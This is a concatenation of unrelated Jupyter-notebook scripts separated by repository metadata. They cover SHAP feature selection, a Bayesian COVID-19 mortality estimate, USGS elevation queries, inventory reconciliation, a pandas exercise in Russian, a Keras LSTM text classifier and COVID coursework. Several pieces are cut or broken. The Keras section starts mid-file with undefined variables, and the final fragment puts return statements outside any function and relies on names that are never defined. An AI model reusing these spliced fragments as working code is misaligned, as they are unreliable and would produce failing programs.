plt.plot(np.arange(89,0,-1), 100*(1-np.cumsum(shap_population_summary[shap_population_rank][::-1]/np.sum(shap_population_summary))))
plt.xlabel('Number of Features Used')
# frequency label
plt.ylabel('Percentage Explained (%)')
# Reversed x-limits so the feature count decreases left-to-right.
plt.axis([90,0,-0.02,102])
# plot title
plt.title('Feature Share of Reduced Feature Set')
plt.show()
# Cumulative SHAP share captured by the 24 most important features, printed as
# a percentage. Terms are accumulated left-to-right exactly as before, so the
# floating-point result is unchanged.
feature_share = sum(
    shap_population_summary[shap_population_rank][i] / np.sum(shap_population_summary)
    for i in range(24)
)
print(feature_share*100)
# #### Get final reduced dataset
# Keep the 24 most important features (per the population SHAP ranking) as the
# final reduced feature set.
features_reduced = shap_population_rank[:24]
# +
import dill
# Snapshot the whole interpreter session to disk so the expensive SHAP
# computations above can be restored later without re-running the notebook.
dill.dump_session('notebook_env.db')
#dill.load_session('notebook_env.db')
# +
# Feature names of reduced feature set
#features_chosen[features_reduced]
# Aggregate SHAP values of reduced feature set
#shap_population_summary[features_reduced}
| 70,067 |
/COVID-19 Mortality Rate.ipynb
|
295d54f33e754f8075b5700d201577600f085a2e
|
[] |
no_license
|
jwrichar/COVID19-mortality
|
https://github.com/jwrichar/COVID19-mortality
| 9 | 1 | null | 2020-04-01T23:45:36 | 2020-03-28T20:32:01 |
Jupyter Notebook
|
Jupyter Notebook
| false | false |
.py
| 737,090 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Estimating the real mortality rate for COVID-19
# In this project, we attempt to estimate the mortality rate for COVID-19 (the "new coronavirus") while controlling for country-level covariates such as access to healthcare and age of population.
#
# The observed mortality of COVID-19 has varied widely from country to country (as of early March 2020), which makes it difficult to get a handle on the actual mortality rate of the virus. For instance, as of March 10, mortality rates have ranged from < 0.1% in places like Germany (1100+ cases) to upwards of 5% in Italy (9000+ cases) and 3.9% in China (80k+ cases).
#
# As of March 10, the **overall reported mortality rate is 3.5%**. However, this figure does not account for systematic biases in case reporting and testing in countries for which the outbreak is more mature.
#
# The point of our modelling work here is to **try to understand and correct for the country-to-country differences that may cause the observed discrepancies in COVID-19 country-wide mortality rates**. That way **we can "undo" those biases and try to pin down an overall *real* mortality rate**.
# ### Country-level covariates
# We've listed out few of the factors that may account for observed differences in mortality rates:
#
# 1. **Time since first case.** There is a delay between the time a victim contracts COVID-19 and eventually succumbs from it. Since the outbreak is at different stages for each country, this should be accounted for. We expect higher mortality rates in countries for which the outbreak is more mature.
# 2. **Government transparency.** Data about cases and deaths are typically reported by government agencies. In less transparent governments, those numbers may be suppressed. I would *expect* that cases are easier to suppress than deaths, so the hypothesis is that less transparent governments have higher observed mortality rates.
# 3. **Healthcare access.** If COVID-19 tests are not easily available, the case count will be under-reported. On the flip-side, survival may be more likely in countries with better healthcare access.
# 4. **Population age.** It has been reported that COVID-19 is more lethal to older individuals. Since I do not have the counts broken down by age demographics, I'd broadly expect countries with older populations to have higher mortality rates.
# +
# Setup and imports
# %matplotlib inline
import warnings
warnings.simplefilter('ignore')
import numpy as np
import pandas as pd
import pymc3 as pm
# Project-local helpers: data loading and the pymc3 model definition.
from source import data, model
# +
# Load the data (see source/data.py):
df = data.get_all_data()
# Impute NA's column-wise: missing values are replaced with each column's mean.
# NOTE(review): assumes all imputed columns are numeric -- confirm, since
# mean() on non-numeric columns would not produce usable fill values.
df = df.apply(lambda x: x.fillna(x.mean()),axis=0)
# #### First we do some exploratory data analysis, plotting the country-wise covariates against each other and the country-wise COVID-19 mortality rates.
print('Overall observed mortality rate: %.2f%%' % (100.0 * df['deaths'].sum() / df['cases'].sum()))
pairs = pd.plotting.scatter_matrix(df[df.columns[2::]], figsize=(12, 12),
hist_kwds={'bins': 20}, s=80, alpha=.8)
# Show the 15 countries with highest number of cases:
df.sort_values('cases', ascending=False).head(15)
# # Model
#
# The approach here is to fit a hierarchical Bayes Binomial model on the case & death counts, while also controlling for the country-level covariates using a GLM with logit link function for the country-level mortality rates.
#
# All model code (using pymc3) can be found in source/model.py.
#
# ### Mathematical description of model
# For those desiring more detailed information about the model, please refer to the text below:
#
# 
#
# ### A note about normalization
# Critical to the interpretation of mu_0 as the "global, de-biased mortality rate" is that the individual covariates be normalized in a way that makes that interpretation valid. What I mean by this is that the case where all country-level covariates are equal to 0 should reflect a country whose individual mortality rate is "as close to the true global rate as we can expect."
#
# With respect to the covariates that we used in this analysis, this translates to:
#
# + "days since first case" - normalize so the **highest** value is zero. We want to know what the rates look like when the outbreak is fully mature.
# + "cpi score" - normalize so the **highest** value is zero. The most transparent goverments should have the least biased rates.
# + "healthcare oop expenditure" - normalize so the **mean** value is zero - to be agnostic to the affect of public vs. private healthcare systems.
# + "hospital beds per capita" - normalize so the **highest** value is zero. More hospital beds likely means more access to care and testing.
# + "HCI" - normalize so the **highest** value is zero. HCI is a proxy for quality of healthcare and education.
# + "% population over 65" - normalize so **mean** value is zero, to reflect the world age demographic as closely as possible.
# + "% population rural" - normalize so **mean** value is zero, to reflect the world urban/rural demographic as closely as possible.
# Initialize the model:
# import importlib
# importlib.reload(model)
mod = model.initialize_model(df)
# Run MCMC sampler
with mod:
trace = pm.sample(100, tune=200,
chains=3, cores=3)
# Visualize the trace of the MCMC sampler to assess convergence
pm.traceplot(trace)
# Posterior plot for mu0
pm.plot_posterior(trace, var_names=['mu_0'], figsize=(14, 6), textsize=18,
credible_interval=0.95, bw=1.0, lw=3, kind='kde')
plt.xlim(0.0, 0.05)
n_samp = len(trace['mu_0'])
mu0_summary = pm.summary(trace).loc['mu_0']
print("COVID-19 Global Mortality Rate.")
print("Posterior mean: %0.3f" % trace['mu_0'].mean())
print("Posterior median: %0.3f" % np.median(trace['mu_0']))
lower = np.sort(trace['mu_0'])[int(n_samp*0.025)]
upper = np.sort(trace['mu_0'])[int(n_samp*0.975)]
print("95%% (2.5%% - 97.5%%) posterior interval: (%0.3f, %0.3f)" % (lower, upper))
print("95%% (HPD) posterior interval: (%0.3f, %0.3f)" % (mu0_summary['hpd_3%'], mu0_summary['hpd_97%']))
# Posterior summary for the beta parameters:
beta_summary = pm.summary(trace).head(7)
beta_summary.index = ['days_since_first_case', 'cpi', 'healthcare_oop', 'tests_per_million', 'hci', 'percent_over65', 'percent_rural']
beta_summary.reset_index(drop=False, inplace=True)
beta_summary
# +
import matplotlib.pyplot as plt
err_vals = ((beta_summary['hpd_3%'] - beta_summary['mean']).values,
(beta_summary['hpd_97%'] - beta_summary['mean']).values)
ax = beta_summary.plot(x='index', y='mean', kind='bar', figsize=(10, 6),
title='Posterior Distribution of Beta Parameters',
yerr=err_vals, color='lightgrey',
legend=False, grid=True,
capsize=5)
beta_summary.plot(x='index', y='mean', color='k', marker='o', linestyle='None',
ax=ax, grid=True, legend=False, xlim=plt.gca().get_xlim())
# -
# ### Interpretation of beta parameters:
#
# 1. days_since_first_case - positive (very statistically significant). As time since outbreak increases, expected mortality rate **increases**, as expected.
# 2. cpi - negative (statistically significant). As government transparency increases, expected mortality rate **decreases**. This is also as expected by our original hypothesis -- corrupt governments will under-report cases (but have a harder time under-reporting deaths), hence inflating the mortality rate.
# 3. healthcare OOP spending - no significant trend.
# 4. HCI - no significant trend.
# 5. percent over 65 - positive (statistically significant). As population age increases, the mortality rate also **increases**, as expected.
# 6. percent rural - slightly negative (barely significant). The more people that live in rural areas, the reported mortality rate **decreases**. Sensible, given the reporting difficulties for rural populations.
#
# These all seem very sensible, and help validate our numerical results.
# ## Conclusion
#
# A couple of take-home points from the analysis.
#
# 1. The "best guess" estimate of mortality rate, once correcting for country-level factors, is only 0.5% -- as opposed to a 3.5% global mortality rate observed in the data. The take-home here is that this is **driven by suppression in the reporting of cases**. That is, **there are a lot more COVID-19 cases right now than are being reported!** Likely a factor of ~7 more.
# 2. Given the current data, our bounds on the true mortality rate are (0.1%, 2%), meaning that we can not yet rule out mortality rates of up to 2%.
# 3. The country-level factors that most impact the reported mortality rate are:
# * days since outbreak (more mature outbreak --> higher mortality)
# * gov't transparency index (more transparent --> lower reported mortality)
# * % of population over 65 (higher aged population --> higher mortality)
# * % of population rural (more rural --> lower reported mortality)
#
# We will continue to re-run the analysis periodically as more data come in, to continually improve the precision of the estimated mortality rate. Further, as case data that is broken down by age range is made available, we can perform a more detailed estimate of mortality by age range.
| 9,623 |
/notebooks/1.2-ijd-fetch-circle-elevations.ipynb
|
f4529867d1704e469f8a946546af6d2821f21dcd
|
[
"MIT"
] |
permissive
|
nbanion/audubon-cbc
|
https://github.com/nbanion/audubon-cbc
| 0 | 0 | null | 2020-06-15T12:36:02 | 2020-06-14T18:38:44 | null |
Jupyter Notebook
| false | false |
.py
| 16,847 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Fetch Circle Elevations
# ### Purpose
# In this notebook I query the USGS to get elevation data for all of the circles.
# This notebook addresses some one of the tasks in Github issue #35
#
# ### Author:
# Ian Davis
# ### Date:
# 2020-03-31
# ### Update Date:
# 2020-05-03
#
# ### Inputs
# 1.1-circles_to_many_stations_usa_weather_data_20200424213015.csv - Comma separate file of the Christmas Bird Count and matches to 1 or more NOAA weather stations.
# - Data Dictionary can be found here: http://www.audubon.org/sites/default/files/documents/cbc_report_field_definitions_2013.pdf
# 1.2-ijd-fetch-circle-elevations-OFFLINE.csv - Previously generated elevation data. This file will be used when you want to get the elevation data from an offline source and avoid 100,000+ queries.
#
# ### Output Files
# 1.2-ijd-fetch-circle-elevations_20200502155633.csv - Only 1 column is added to the dataset, 'circle_elev'. This column is the elevation in meters for a given latitude and longitude of the circle centroid.
#
# ## Steps or Proceedures in the notebook
# - Set runtime options
# - Set option to retrieve elevations from offline source, or through the USGS queries
# - Set option to only test the USGS query (NOTE: running the query function for the whole dataset will take 24+ hours)
# - Create a function to make a remote request to the USGS API
# - Create a function to supply inputs to the remote request and return the elevation value
# - Main sequence
# - Read in dataset
# - Create circle_elev column
# - Loop through the dataset in chunks of 10000 to get elevation data
# - (Optional) Retrieve elevations from offline data source instead of queries
# - Write new dataset .txt file
#
# ## References
# - elevation query: https://stackoverflow.com/questions/58350063/obtain-elevation-from-latitude-longitude-coordinates-with-a-simple-python-script
# - lamda functions: https://thispointer.com/python-how-to-use-if-else-elif-in-lambda-functions/
# - apply on Nulls: https://stackoverflow.com/questions/26614465/python-pandas-apply-function-if-a-column-value-is-not-null
# Imports
import pandas as pd
import numpy as np
import requests
import urllib
import urllib3
import time
import gzip
import logging
import sys
from datetime import datetime
# Check to see if you are running 32-bit Python (output would be False)
# 32-bit Python could result in Memory Error when reading in large dataset
import sys
sys.maxsize > 2**32
# ## Set File Paths and Runtime Options
# +
# Used to classify the name
time_now = datetime.today().strftime('%Y%m%d%H%M%S')
# File paths and script options
PATH_TO_PAIRED_DATA = "../data/Cloud_Data/1.1-circles_to_many_stations_usa_weather_data_20200424213015.csv"
PATH_TO_OFFLINE_ELEVATION_DATA = "../data/Cloud_Data/1.2-ijd-fetch-circle-elevations-OFFLINE.csv"
PATH_TO_LOG_FILE = "../data/Cloud_Data/1.2-ijd-fetch_circle_elevations_"+time_now+".log"
# option to pull offline elevation data from the /attic instead of running the queries
get_offline_data = False
# option to run a simple test of the query; only 1000 rows are queried instead of full dataset
test_query = False
# -
# ## Create a Log File
if not get_offline_data:
logging.basicConfig(filename=PATH_TO_LOG_FILE,
filemode='w',
format='%(message)s',
level=logging.INFO)
logging.info('This log file shows the row index, lat, lon\n')
# ## Create a function to make a remote request to the USGS API
def make_remote_request(url: str, params: dict):
    """
    Make a GET request to ``url`` with the URL-encoded ``params`` appended.

    Retries forever on connection-level failures (``OSError`` /
    ``urllib3`` protocol errors), sleeping half a second between attempts.
    A one-second pause follows every successful request to throttle the
    overall query rate against the USGS service.

    Returns the successful ``requests`` response object.
    """
    count = 1
    while True:
        try:
            response = requests.get((url + urllib.parse.urlencode(params)))
            time.sleep(1)  # throttle: be polite to the USGS endpoint
        except (OSError, urllib3.exceptions.ProtocolError) as error:
            # BUG FIX: logging.info() takes one message string plus %-style
            # format args. The old code passed several bare positional
            # arguments ('*' * 20, 'Error Occured', ...) with no placeholders,
            # which makes the logging handler raise a formatting error and
            # drop the message. Log one %-formatted message instead.
            logging.info(
                '\n%s Error Occurred %s\nNumber of tries: %d\nURL: %s\n%s\n',
                '*' * 20, '*' * 20, count, url, error,
            )
            count += 1
            time.sleep(0.5)
            continue
        break
    return response
# ## Create a function to supply inputs to the remote request and return the elevation value
def elevation_function(x):
    """
    Look up the ground elevation (metres) for one row of coordinates.

    ``x`` is a sequence/Series where ``x[0]`` is the latitude and ``x[1]``
    is the longitude (the callers pass the ``['lat', 'lon']`` columns).
    Delegates the HTTP call to ``make_remote_request`` and unpacks the
    elevation value from the USGS point-query JSON response.
    """
    # NOTE(review): this is the legacy EPQS endpoint; confirm it is still
    # reachable before re-running the full 100k+ query batch.
    service_url = 'https://nationalmap.gov/epqs/pqs.php?'
    query = {'x': x[1],   # longitude
             'y': x[0],   # latitude
             'units': 'Meters',
             'output': 'json'}
    # Record progress (row index, lat, lon) in the log file.
    logging.info('\t\t'.join([str(x.name), str(x[0]), str(x[1])]))
    reply = make_remote_request(service_url, query)
    return reply.json()['USGS_Elevation_Point_Query_Service']['Elevation_Query']['Elevation']
# ## Loops to Query the USGS API
# Boolean to skip loop of queries and just pull elevation data from the "attic"
if not get_offline_data:
# load paired data file
#data_iterator = pd.read_csv(PATH_TO_TEMP_DATA, chunksize=1000, encoding = "ISO-8859-1", sep="\t")
data_iterator = pd.read_csv(PATH_TO_PAIRED_DATA, chunksize=1000, compression='gzip')
chunk_list = []
# Each chunk is in dataframe format
for data_chunk in data_iterator:
# create elevation column
data_chunk.loc[:, 'circle_elev'] = np.nan
# initial list of indices which are missing elevations
missing = data_chunk.loc[data_chunk['circle_elev'].isnull()].index
# while loop to go over the dataset chunk times in the event that query requests fail
cnt=0 # counter to break while loop after
while len(missing) > 0:
if cnt == 5: break # exit while loop
cnt+=1
logging.info('while counter: '+str(cnt))
try:
# combination of apply() function and lambda() function, only on nulls (see reference links above)
data_chunk.loc[:, 'circle_elev'] = data_chunk.loc[:, ['lat', 'lon', 'circle_elev']].apply(lambda x: elevation_function(x[0:2]) if(pd.isnull(x[2])) else x[2], axis=1)
except:
# on occasion query completely fails and crashes the function call
# problem is the stack prints to the notebook
# https://gist.github.com/wassname/d17325f36c36fa663dd7de3c09a55e74
#logging.error("Exception occurred", exc_info=True)
logging.info("Exception occurred")
continue
# get new list of missing indices
missing = data_chunk.loc[data_chunk['circle_elev'].isnull()].index
# break the loop if there are no missing elevations
if len(missing) == 0: break
# Append data chunk with elevation data to combined list
chunk_list.append(data_chunk)
# Convert combined list into dataframe
filtered_data = pd.concat(chunk_list)
# Intermediate writes to .csv file so work is not lost in the event of code failure
filtered_data.to_csv("../data/Cloud_Data/1.2-ijd-fetch-circle-elevations_INT.csv", sep=',', index=False)
del(filtered_data)
# If just running a test, break the loop
if test_query: break
# Convert combined list into dataframe
filtered_data = pd.concat(chunk_list)
# close log file
#log.close()
# ## (Optional) Get Elevation Data from Offline Source
if get_offline_data:
# load offline data file
offline_data = pd.read_csv(PATH_TO_OFFLINE_ELEVATION_DATA)
# convert count_date to string or merge won't match them properly
offline_data['count_date'] = pd.to_datetime(offline_data['count_date'])
# round the latitude and longitudes to 4 digits
offline_data['lat'] = offline_data['lat'].round(3)
offline_data['lon'] = offline_data['lon'].round(3)
# load paired data file
#data_iterator = pd.read_csv(PATH_TO_TEMP_DATA, chunksize=10000, encoding = "ISO-8859-1", sep="\t")
data_iterator = pd.read_csv(PATH_TO_PAIRED_DATA,
compression='gzip',
chunksize=10000)
chunk_list = []
# Each chunk is in dataframe format
print('The chunks should be the same length after merge.')
for data_chunk in data_iterator:
data_chunk['count_date'] = pd.to_datetime(data_chunk['count_date'])
data_chunk['lat'] = data_chunk['lat'].round(3)
data_chunk['lon'] = data_chunk['lon'].round(3)
filtered_chunk = pd.merge(data_chunk,
offline_data[['lat', 'lon', 'count_date', 'count_year', 'id', 'circle_elev']],
on=['lat', 'lon', 'count_date', 'count_year', 'id'],
how='left',
copy=False)
chunk_list.append(filtered_chunk)
print('Chunk Length Before: ', data_chunk.shape)
print('Chunk Length After: ', filtered_chunk.shape)
filtered_data = pd.concat(chunk_list)
# find duplicates in offline data
if get_offline_data:
offline_data.duplicated(subset=['lat', 'lon', 'count_date', 'count_year', 'id']).value_counts()
# are there any duplicates in the data chunk?
if get_offline_data:
data_chunk.duplicated(subset=['lat', 'lon', 'count_date', 'count_year', 'id']).value_counts()
# ## Screen Elevation Data
# Ensure elevations are the float
filtered_data = pd.concat(chunk_list)
filtered_data.loc[:, 'circle_elev'] = filtered_data.loc[:, 'circle_elev'].astype(float)
# Remove bad elevation values
filtered_data.loc[filtered_data['circle_elev'] < -10000.0, 'circle_elev'] = np.nan
filtered_data[['lat', 'lon', 'count_date', 'circle_elev']].head(50)
# Create histogram of elevations
filtered_data.hist(column='circle_elev')
# Same number of rows? Should be 109390
len(filtered_data.index)
# drop unnamed columns
# they were likely index columns auto-generated by pandas and then written to csv files, unintentionally
filtered_data = filtered_data.loc[:, ~filtered_data.columns.str.contains('^Unnamed')]
# sort dataframe on existing index
filtered_data.sort_values(['int64_field_0'], ascending=[True], inplace=True)
filtered_data.head()
if get_offline_data:
print('If from an offline source, check to make sure circle elevations are not being lost during merge:\n')
print('NA in Merged:\n', filtered_data['circle_elev'].isna().value_counts())
print('\n')
print('NA in Offline:\n', offline_data['circle_elev'].isna().value_counts())
print('Missing elevations:')
filtered_data['circle_elev'].isna().value_counts()
print('How many elevations at sea level?')
filtered_data.loc[filtered_data['circle_elev'] == 0.0].shape
# ## Save the output
filtered_data.to_csv("../data/Cloud_Data/1.2-ijd-fetch-circle-elevations_"+time_now+".csv",
sep=',',
compression='gzip',
index=False)
| 11,335 |
/src/.ipynb_checkpoints/storage_match-checkpoint.ipynb
|
085e4421ccd7a1a329b3c43f9dfcf1468c3401f3
|
[] |
no_license
|
Liu-Ruiyang/Fossil-Finance-Processor
|
https://github.com/Liu-Ruiyang/Fossil-Finance-Processor
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 48,189 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import os
import pandas as pd
import numpy as np
import natsort
pd.set_option('display.max_rows', None)
from decimal import *
getcontext().prec = 2
from tkinter import *
import tkinter as tk
import tkinter.messagebox as messagebox
from functools import partial
# -
# Read the three sheets separately, using NAV as the baseline: nav == p1 + (changed)
def get_nav(file_name):
    """Return the 'NAV P1' sheet of the workbook as a NumPy array."""
    nav_df = pd.DataFrame(pd.read_excel(file_name, sheet_name='NAV P1'))
    return np.array(nav_df)
def get_tp(file_name):
    """Return the 'TP P1' sheet of the workbook as a NumPy array."""
    tp_df = pd.DataFrame(pd.read_excel(file_name, sheet_name='TP P1'))
    return np.array(tp_df)
def get_sent(file_name):
    """Return the shipped-but-not-received sheet of the workbook as a NumPy array."""
    sent_df = pd.DataFrame(pd.read_excel(file_name, sheet_name='已发货未入库'))
    return np.array(sent_df)
def check_storage(nav_array, tp_array, sent_array):
    """
    Reconcile NAV quantities against TP and in-transit ("sent") quantities.

    For every NAV row ``[ax, quantity]`` the matching TP row is located by
    searching the whole TP array for the AX code. Rows with no match or
    more than one match are reported on stdout and skipped. For matched
    rows, ``differ = NAV - TP``; when nonzero, all in-transit quantities
    for that AX (column 4 of ``sent_array``, summed across duplicates) are
    subtracted as well and recorded in the 'sent' column.

    Returns a DataFrame with columns ['AX', 'NAV', 'TP', 'sent', 'differ']
    ('sent' is NaN for rows where NAV and TP already agreed).

    BUG FIX: the original grew the result with ``DataFrame.append`` inside
    the loop — quadratic, and removed in pandas 2.0. Rows are now collected
    in a list and the frame is built once at the end.
    """
    rows = []
    for nav_row in nav_array:
        ax, nav_num = nav_row[0], nav_row[1]
        locs = np.argwhere(ax == tp_array)
        if len(locs) > 1:
            print('found duplicate in TP')
        elif len(locs) < 1:
            print('found no TP, and ax is ' + ax)
        else:
            # Exactly one TP match; its row index is the first coordinate.
            index_tp = locs[0][0]
            tp_ax = tp_array[index_tp][1]
            tp_num = tp_array[index_tp][2]
            if ax == tp_ax:
                diff = nav_num - tp_num
                if diff != 0:
                    # Sum every in-transit quantity for this AX (there may
                    # be duplicate shipment rows in sent_array).
                    sent_all = 0
                    for loc in np.argwhere(ax == sent_array):
                        sent_all = sent_all + sent_array[loc[0], 4]
                    diff = diff - sent_all
                    rows.append({'AX': ax, 'NAV': nav_num, 'TP': tp_num,
                                 'sent': sent_all, 'differ': diff})
                else:
                    rows.append({'AX': ax, 'NAV': nav_num, 'TP': tp_num,
                                 'differ': diff})
            else:
                print('error : ax and tp_ax do not match!')
    result_df = pd.DataFrame(rows, columns=['AX', 'NAV', 'TP', 'sent', 'differ'])
    return result_df
# +
# Main driver: load all three sheets from the reconciliation workbook and
# run the storage check.
file_name = '../Processor/Category/2021 P1 AX 库存核对- r.xlsx'
nav_array = get_nav(file_name)
tp_array = get_tp(file_name)
sent_array = get_sent(file_name)
result_df = check_storage(nav_array,tp_array,sent_array)
result_df
# -
# Scratch cell: manually inspect the TP match for the second NAV row
# (index 1); mirrors the lookup logic inside check_storage.
ax = nav_array[1,0]
locs = np.argwhere(ax==tp_array)
index_tp = locs[0][0]
tp_ax = tp_array[index_tp][1]
tp_num = tp_array[index_tp][2]
print(tp_ax)
print(tp_num)
| 3,162 |
/labs/lab7.ipynb
|
63773ec3c6e777b340b67d6f005aae89307aa5cf
|
[] |
no_license
|
elvinafakhritdinova/first
|
https://github.com/elvinafakhritdinova/first
| 0 | 1 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 25,018 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# **Задание 1**
# Для датафрейма log из материалов занятия создайте столбец source_type по следующим правилам:
#
# если источник traffic_source равен yandex или google, то в source_type ставится organic
# для источников paid и email из России - ставим ad
# для источников paid и email не из России - ставим other
# все остальные варианты берем из traffic_source без изменений
#
#
import pandas as pd
import numpy as np
log = pd.read_csv('12._Python_12_pivot_and_str/visit_log.csv', sep=';')
log.head()
# Rule 1: yandex/google traffic is organic.
log.loc[log.traffic_source.isin(['yandex','google']), 'source_type']='organic'
log.head(10)
# BUG FIX: per the task spec above, paid/email traffic *from Russia* gets
# 'ad' (the original wrongly assigned 'organic'), paid/email from any other
# region gets 'other', and every remaining source keeps its traffic_source
# value unchanged.
paid_mask = log.traffic_source.isin(['paid','email'])
log.loc[paid_mask & (log.region=='Russia'), 'source_type'] = 'ad'
log.loc[paid_mask & (log.region!='Russia'), 'source_type'] = 'other'
log.loc[log.source_type.isnull(), 'source_type'] = log.traffic_source
log.head(10)
# **Задание 2**
# В файле URLs.txt содержатся url страниц новостного сайта. Вам необходимо отфильтровать его по адресам страниц с текстами новостей. Известно, что шаблон страницы новостей имеет внутри url следующую конструкцию: /, затем 8 цифр, затем дефис. Выполните следующие действия:
#
# Прочитайте содержимое файла с датафрейм
# Отфильтруйте страницы с текстом новостей, используя метод str.contains и регулярное выражение в соответствии с заданным шаблоном
table = pd.read_csv('URLs.txt')
reg = r'/\d{8}-'
table[table.url.str.contains(reg)]
# **Задание 3**
# В датафрейме data создайте столбец lemmas, в котором вычислите леммы поисковых запросов из столбца keyword. Леммы должны иметь строковый тип.
from pymystem3 import Mystem
data = pd.DataFrame({
'keyword': ['курс гривны к рублю', 'доллары в рубли', '100 долларов в рублях', 'курс рубля'],
'shows': [125076, 114173, 97534, 53546],
})
def makelem(dateFrame):
    """Return the space-joined, stripped lemmas of the row's 'keyword' text.

    Intended for use with DataFrame.apply(axis=1); the result is a plain
    string suitable for the 'lemmas' column.
    """
    # PERF FIX: Mystem() spawns an external process, so building a new one
    # per row is very expensive. Cache a single instance on the function
    # and reuse it across all rows (interface unchanged).
    if not hasattr(makelem, '_mystem'):
        makelem._mystem = Mystem()
    lemmas = ' '.join(makelem._mystem.lemmatize(dateFrame['keyword']))
    return lemmas.strip()
data['lemmas'] = data.apply(makelem, axis=1)
data.head()
g
word2idx = tokenizer.word_index
print('Found %s unique tokens.' % len(word2idx))
# pad sequences so that we get a N x T matrix
data = pad_sequences(sequences, maxlen=MAX_SEQUENCE_LENGTH)
print('Shape of data tensor:', data.shape)
# prepare embedding matrix
print('Filling pre-trained embeddings...')
num_words = min(MAX_VOCAB_SIZE, len(word2idx) + 1)
embedding_matrix = np.zeros((num_words, EMBEDDING_DIM))
for word, i in word2idx.items():
if i < MAX_VOCAB_SIZE:
embedding_vector = word2vec.get(word)
if embedding_vector is not None:
# words not found in embedding index will be all zeros.
embedding_matrix[i] = embedding_vector
# load pre-trained word embeddings into an Embedding layer
# note that we set trainable = False so as to keep the embeddings fixed
embedding_layer = Embedding(
num_words,
EMBEDDING_DIM,
weights=[embedding_matrix],
input_length=MAX_SEQUENCE_LENGTH,
trainable=False
)
print('Building model...')
# create an LSTM network with a single LSTM
# Functional API: token-id sequences in, one sigmoid unit per label out
# (multi-label classification, hence sigmoid rather than softmax).
input_ = Input(shape=(MAX_SEQUENCE_LENGTH,))
x = embedding_layer(input_)
# x = LSTM(15, return_sequences=True)(x)
x = Bidirectional(LSTM(15, return_sequences=True))(x)
# Max-pool over the time axis to collapse the sequence into one vector.
x = GlobalMaxPool1D()(x)
output = Dense(len(possible_labels), activation="sigmoid")(x)
model = Model(input_, output)
# NOTE(review): tf.keras 2.x renamed Adam's 'lr' argument to
# 'learning_rate'; 'lr' still works but is deprecated — confirm the Keras
# version this targets.
model.compile(
  loss='binary_crossentropy',
  optimizer=Adam(lr=0.01),
  metrics=['accuracy'],
)
print('Training model...')
r = model.fit(
  data,
  targets,
  batch_size=BATCH_SIZE,
  epochs=EPOCHS,
  validation_split=VALIDATION_SPLIT
)
# plot some data
plt.plot(r.history['loss'], label='loss')
plt.plot(r.history['val_loss'], label='val_loss')
plt.legend()
plt.show()
# accuracies
plt.plot(r.history['accuracy'], label='acc')
plt.plot(r.history['val_accuracy'], label='val_acc')
plt.legend()
plt.show()
p = model.predict(data)
aucs = []
for j in range(6):
auc = roc_auc_score(targets[:,j], p[:,j])
aucs.append(auc)
print(np.mean(aucs))
| 4,013 |
/Jim.ipynb
|
df2da60b167e004911c2583e021b5bb938dc3b4d
|
[] |
no_license
|
SamanthaWang0117/covid_coursework
|
https://github.com/SamanthaWang0117/covid_coursework
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 108,139 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Analysis of COVID-19 data
# With help from Carmen and her associates!
from pathlib import Path
from process_covid import (load_covid_data,
cases_per_population_by_age,
hospital_vs_confirmed,
create_confirmed_plot,
count_high_rain_low_tests_days)
# The data for each area is held in a specific file. Start by loading it in.
data_directory = Path("covid_data")
data_file = "ER-Mi-EV_2020-03-16_2020-04-24.json"
data_er = load_covid_data(data_directory / data_file)
print(data_er)
type(data_er)
# And now I can use this variable to do my different analyses.
#
# First, I want to see how the number of cases has changed across time, but separated into age groups. This will help me find age-dependent patterns in the spread of the virus.
cases_population = cases_per_population_by_age(data_er)
cases_population.get('0-24', "No data in that bin")
# I am also interested in how many cases end up in hospital. Specifically, I want to look at the ratio
# $$\frac{\textrm{people hospitalised}}{\textrm{confirmed cases}}$$
# and how it changes over time.
#
# I haven't decided what exactly I'll do with it yet, so for now I only want to get two lists: one with the dates on which the ratio is computed, and another with its corrsponding values.
hosp_conf_dates, hosp_conf_ratio = hospital_vs_confirmed(data_er)
for date, ratio in zip(hosp_conf_dates[:5], hosp_conf_ratio[:5]):
print(f" {date}: {ratio:.2f}")
# Plots will be crucial for getting the information across efficiently. Carmen says that this one function is flexible enough to process the data in different ways. One thing I want to see is the evolution of confirmed cases grouped by the patient's sex. This command should plot two lines, one each for male and female:
create_confirmed_plot(data_er, sex=True)
if sex == False and len(max_age) > 0:
# for each max_age number in the max_age
for k in range(1, len(Index_hosp) + 1):
if len(max_age) == k:
age_group = []
for a in input_data["evolution"].values():
age_sum_per_day = 0
for i in range(0, k):
# skip the Null value and sum up all the useful value
if a["epidemiology"]["confirmed"][status]["age"][i] is None:
continue
else:
age_sum_per_day = age_sum_per_day + a["epidemiology"]["confirmed"][status]["age"][i]
age_group.append(age_sum_per_day)
return age_group
if sex == False and len(max_age) == 0:
raise NotImplementedError('wrong input')
if sex == True and len(max_age) > 0:
raise NotImplementedError('wrong input')
for a in input_data["evolution"].values():
each_day.append(a["epidemiology"]["confirmed"]["total"]["age"])
if each_day == [] or each_day[0:len(data_list)] is None:
raise NotImplementedError("the age group is missing")
# return each_day
# find out the null dataset and delete it.
# return each_day
for i in range(len(data_list)):
b = each_day[i]
index = 0
try:
if b[0] is None or len(b) == 0:
del data_list[i]
index = index + 1
continue
else:
for k in range(len(overall)):
each_data_per.append(b[index] / overall[index])
index = index + 1
except:
raise NotImplementedError("the missing data in files")
# return each_data_per
# Only the reasonable value can be reserved.
# grant value to each age group
for day in range(len(data_list)):
for i in range(len(x3)):
